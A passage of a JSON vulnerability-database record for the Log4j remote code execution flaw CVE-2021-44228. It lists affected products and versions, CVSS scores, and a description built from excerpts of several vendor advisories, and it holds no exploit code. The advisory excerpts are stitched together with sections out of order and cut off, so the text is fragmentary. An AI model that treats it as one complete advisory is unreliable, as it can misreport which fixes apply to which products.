"scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "2020" }, { "model": "cloud insights", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "log4j", "scope": "eq", "trust": 1.0, "vendor": "apache", "version": "2.0" }, { "model": "sensor solution development kit", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "crosswork network controller", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.0.1" }, { "model": "gma-manager", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "8.6.2j-398" }, { "model": "business process automation", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "3.1.000.044" }, { "model": "identity services engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "003.000\\(000.458\\)" }, { "model": "prime service catalog", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.1" }, { "model": "crosswork optimization engine", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.0.1" }, { "model": "vesys", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "2019.1" }, { "model": "siveillance viewpoint", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "sd-wan vmanage", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "20.5" }, { "model": "automated subsea tuning", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.1.0" }, { "model": "log4j", "scope": "gte", "trust": 1.0, "vendor": "apache", "version": "2.4.0" }, { "model": "crosswork data gateway", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.0.0" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "34" }, { "model": "paging server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "14.0\\(1\\)" }, { "model": "dna center", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.2.3.4" }, { "model": "sd-wan vmanage", "scope": "eq", "trust": 
1.0, "vendor": "cisco", "version": "20.4" }, { "model": "ucs central", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1p\\)" }, { "model": "email security", "scope": "lt", "trust": 1.0, "vendor": "sonicwall", "version": "10.0.12" }, { "model": "smart phy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.1.3" }, { "model": "synchro", "scope": "gte", "trust": 1.0, "vendor": "bentley", "version": "6.1" }, { "model": "sentron powermanager", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "4.1" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "dna spaces", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": null }, { "model": "crosswork network automation", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.0.0" }, { "model": "wan automation engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.5" }, { "model": "spectrum power 4", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "4.70" }, { "model": "automated subsea tuning", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "02.01.00" }, { "model": "sd-wan vmanage", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "20.6.1" }, { "model": "unified sip proxy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "010.000\\(001\\)" }, { "model": "comos", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1b\\)" }, { "model": "fxos", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.6.0" }, { "model": "unity connection", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)" }, { "model": "sentron powermanager", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "4.2" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0" }, { "model": "evolved 
programmable network manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "4.1" }, { "model": "logo\\! soft comfort", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "evolved programmable network manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.0" }, { "model": "unified communications manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1.18119.2\\)" }, { "model": "network assurance engine", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "6.0.2" }, { "model": "emergency responder", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(4\\)" }, { "model": "log4j", "scope": "gte", "trust": 1.0, "vendor": "apache", "version": "2.13.0" }, { "model": "cloudcenter suite", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "4.10\\(0.15\\)" }, { "model": "wan automation engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.2.2" }, { "model": "dna center", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.2.2.8" }, { "model": "secure device onboard", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "solid edge cam pro", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "fxos", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.0.0" }, { "model": "unified sip proxy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "010.002\\(001\\)" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(2\\)" }, { "model": "sd-wan vmanage", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "20.3.4.1" }, { "model": "log4j", "scope": "lt", "trust": 1.0, "vendor": "apache", "version": "2.3.1" }, { "model": "energyip prepay", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "3.7" }, { "model": "audio development kit", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null 
}, { "model": "common services platform collector", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "002.009\\(001.001\\)" }, { "model": "video surveillance manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.14\\(1.26\\)" }, { "model": "xpedition package integrator", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": null }, { "model": "genomics kernel library", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "007.003.001.001" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1g\\)" }, { "model": "identity services engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "003.002\\(000.116\\)" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1h\\)" }, { "model": "business process automation", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "3.0.000.115" }, { "model": "desigo cc advanced reports", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "4.2" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "35" }, { "model": "connected mobile experiences", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": null }, { "model": "cloudcenter workload manager", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "5.5.2" }, { "model": "unity connection", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1.10000.6\\)" }, { "model": "spectrum power 7", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "2.30" }, { "model": "fog director", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": null }, { "model": "network services orchestrator", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "5.6.3.1" }, { "model": "common services platform collector", "scope": "eq", 
"trust": 1.0, "vendor": "cisco", "version": "002.009\\(001.002\\)" }, { "model": "log4j", "scope": "gte", "trust": 1.0, "vendor": "apache", "version": "2.0.1" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "10.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.0" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "006.005.000.000" }, { "model": "enterprise chat and email", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(1\\)" }, { "model": "smart phy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "21.3" }, { "model": "contact center management portal", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(1\\)" }, { "model": "crosswork network automation", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "4.1.0" }, { "model": "unified customer voice portal", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(1\\)" }, { "model": "data center manager", "scope": "lt", "trust": 1.0, "vendor": "intel", "version": "5.1" }, { "model": "crosswork platform infrastructure", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "4.1.0" }, { "model": "cloudcenter suite", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "5.5\\(0\\)" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "007.001.000" }, { "model": "unified communications manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1.22900.28\\)" }, { "model": "unified contact center express", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(1\\)" }, { "model": "dna spaces connector", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": null }, { "model": "desigo cc advanced reports", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "5.0" }, { "model": 
"synchro", "scope": "lt", "trust": 1.0, "vendor": "bentley", "version": "6.4.3.2" }, { "model": "energyip", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "8.7" }, { "model": "common services platform collector", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "002.009\\(000.002\\)" }, { "model": "siguard dsa", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "4.4" }, { "model": "business process automation", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "3.1.000.000" }, { "model": "identity services engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "002.006\\(000.156\\)" }, { "model": "snow commander", "scope": "lt", "trust": 1.0, "vendor": "snowsoftware", "version": "8.10.0" }, { "model": "paging server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "8.4\\(1\\)" }, { "model": "network services orchestrator", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "5.3.5.1" }, { "model": "fxos", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.5.0" }, { "model": "energyip prepay", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "3.8" }, { "model": "cloud manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "unified communications manager im \\\u0026 presence service", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1.22900.6\\)" }, { "model": "head-end system universal device integration system", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "unified communications manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)su3" }, { "model": "unified sip proxy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "010.000\\(000\\)" }, { "model": "industrial edge management", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "webex meetings server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": 
"4.0" }, { "model": "cloudcenter suite", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "5.3\\(0\\)" }, { "model": "industrial edge management hub", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "2021-12-13" }, { "model": "oneapi sample browser", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "virtualized voice browser", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(1\\)" }, { "model": "operation scheduler", "scope": "lte", "trust": 1.0, "vendor": "siemens", "version": "1.1.3" }, { "model": "sd-wan vmanage", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "20.4.2.1" }, { "model": "finesse", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(1\\)" }, { "model": "advanced malware protection virtual private cloud appliance", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "3.5.4" }, { "model": "integrated management controller supervisor", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "002.003\\(002.000\\)" }, { "model": "synchro 4d", "scope": "lt", "trust": 1.0, "vendor": "bentley", "version": "6.2.4.2" }, { "model": "unified intelligence center", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "mendix", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "firepower threat defense", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.6.0" }, { "model": "siveillance identity", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "1.5" }, { "model": "unified customer voice portal", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "11.6" }, { "model": "network dashboard fabric controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.4\\(1\\)" }, { "model": "unified communications manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1.21900.40\\)" }, { "model": "common services platform collector", "scope": 
"gte", "trust": 1.0, "vendor": "cisco", "version": "2.10.0" }, { "model": "identity services engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "002.004\\(000.914\\)" }, { "model": "wan automation engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.4" }, { "model": "siveillance control pro", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "system studio", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "11.0" }, { "model": "network dashboard fabric controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)" }, { "model": "integrated management controller supervisor", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.3.2.0" }, { "model": "sd-wan vmanage", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "20.3" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1f\\)" }, { "model": "intersight virtual appliance", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.9-343" }, { "model": "teamcenter", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "captial", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "2019.1" }, { "model": "desigo cc advanced reports", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "5.1" }, { "model": "dna spaces\\: connector", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.5" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "006.004.000.003" }, { "model": "video surveillance operations manager", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "7.14.4" }, { "model": "enterprise chat and email", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.0\\(1\\)" }, { "model": "emergency responder", "scope": "eq", 
"trust": 1.0, "vendor": "cisco", "version": "11.5" }, { "model": "firepower threat defense", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.0.0" }, { "model": "ontap tools", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "sd-wan vmanage", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "20.6" }, { "model": "dna center", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.1.2.8" }, { "model": "fxos", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.7.0" }, { "model": "sd-wan vmanage", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "20.8" }, { "model": "mindsphere", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "2021-12-11" }, { "model": "cloudcenter", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "4.10.0.16" }, { "model": "unified communications manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)" }, { "model": "cloudcenter suite", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "5.5\\(1\\)" }, { "model": "identity services engine", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.4.0" }, { "model": "unified contact center management portal", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "crosswork network automation", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "4.1.1" }, { "model": "unified communications manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1.17900.52\\)" }, { "model": "spectrum power 4", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "4.70" }, { "model": "unified communications manager im and presence service", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)" }, { "model": "crosswork network controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.0.0" }, { "model": "common services platform collector", "scope": "eq", "trust": 1.0, 
"vendor": "cisco", "version": "002.010\\(000.000\\)" }, { "model": "video surveillance manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.14\\(2.26\\)" }, { "model": "network services orchestrator", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": null }, { "model": "broadworks", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2021.11_1.162" }, { "model": "smart phy", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "3.2.1" }, { "model": "cyber vision", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "4.0.2" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "007.002.000" }, { "model": "paging server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(2\\)" }, { "model": "iot operations dashboard", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": null }, { "model": "nexus dashboard", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.1.2" }, { "model": "siguard dsa", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "4.3" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1k\\)" }, { "model": "common services platform collector", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.10.0.1" }, { "model": "fxos", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.1.0" }, { "model": "paging server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "9.1\\(1\\)" }, { "model": "network dashboard fabric controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(3\\)" }, { "model": "cloud connect", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "desigo cc advanced reports", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "4.1" }, { "model": "common services platform collector", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": 
"002.009\\(001.000\\)" }, { "model": "xcode", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "13.3" }, { "model": "data center network manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.3\\(1\\)" }, { "model": "dna center", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.2.2.8" }, { "model": "enterprise chat and email", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "007.003.000" }, { "model": "workload optimization manager", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "3.2.1" }, { "model": "siveillance command", "scope": "lte", "trust": 1.0, "vendor": "siemens", "version": "4.16.2.1" }, { "model": "unified computing system", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "006.008\\(001.000\\)" }, { "model": "fxos", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.2.3" }, { "model": "sipass integrated", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "2.80" } ], "sources": [ { "db": "NVD", "id": "CVE-2021-44228" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "165295" }, { "db": "PACKETSTORM", "id": "165286" }, { "db": "PACKETSTORM", "id": "165287" }, { "db": "PACKETSTORM", "id": "165288" }, { "db": "PACKETSTORM", "id": "165289" }, { "db": "PACKETSTORM", "id": "165297" }, { "db": "PACKETSTORM", "id": "165298" }, { "db": "PACKETSTORM", "id": "165329" }, { "db": "PACKETSTORM", "id": "165632" } ], "trust": 0.9 }, "cve": "CVE-2021-44228", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, 
"cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2021-44228", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "VHN-407408", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2021-44228", "impactScore": 6.0, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-44228", "trust": 1.0, "value": "CRITICAL" }, { "author": "CNNVD", "id": "CNNVD-202112-799", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": 
"VHN-407408", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2021-44228", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-407408" }, { "db": "VULMON", "id": "CVE-2021-44228" }, { "db": "CNNVD", "id": "CNNVD-202112-799" }, { "db": "NVD", "id": "CVE-2021-44228" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1971 - Applying cluster state is causing elasticsearch to hit an issue and become unusable\n\n6. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Critical: Red Hat AMQ Streams 1.6.5 release and security update\nAdvisory ID: RHSA-2021:5133-01\nProduct: Red Hat JBoss AMQ\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:5133\nIssue date: 2021-12-14\nCVE Names: CVE-2021-44228\n====================================================================\n1. Summary:\n\nRed Hat AMQ Streams 1.6.5 is now available from the Red Hat Customer\nPortal. \n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat AMQ Streams, based on the Apache Kafka project, offers a\ndistributed backbone that allows microservices and other applications to\nshare data with extremely high throughput and extremely low latency. \n\nThis release of Red Hat AMQ Streams 1.6.5 serves as a replacement for Red\nHat AMQ Streams 1.6.4, and includes security and bug fixes, and\nenhancements. For further information, refer to the release notes linked to\nin the References section. \n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\n3. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-44228\nhttps://access.redhat.com/security/updates/classification/#critical\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.6.5\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2021-009\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. 
=========================================================================\nUbuntu Security Notice USN-5192-2\nDecember 17, 2021\n\napache-log4j2 vulnerability\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n\nSummary:\n\nApache Log4j 2 could be made to crash or run programs as an administrator\nif it received a specially crafted input. This update provides\nthe corresponding update for Ubuntu 16.04 ESM. \n\nOriginal advisory details:\n\n Chen Zhaojun discovered that Apache Log4j 2 allows remote attackers to run\n programs via a special crafted input. An attacker could use this vulnerability\n to cause a denial of service or possibly execute arbitrary code. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n liblog4j2-java 2.4-2ubuntu0.1~esm1\n\nIn general, a standard system update will make all the necessary changes. The purpose of this\ntext-only errata is to inform you about the security issues fixed in this\nrelease. 
\n\nInstallation instructions are available from the Fuse product documentation\npages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\n4. \n\nVMware Unified Access Gateway\nVMware Carbon Black Workload Appliance\nVMware Site Recovery Manager, vSphere Replication\nVMware Tanzu GemFire\nVMware Tanzu GemFire for VMs\nVMware Tanzu Operations Manager\nVMware Tanzu Application Service for VMs\nVMware Horizon Agents Installer\n\nYou are receiving this alert because you are subscribed to the VMware Security Announcements mailing list. 
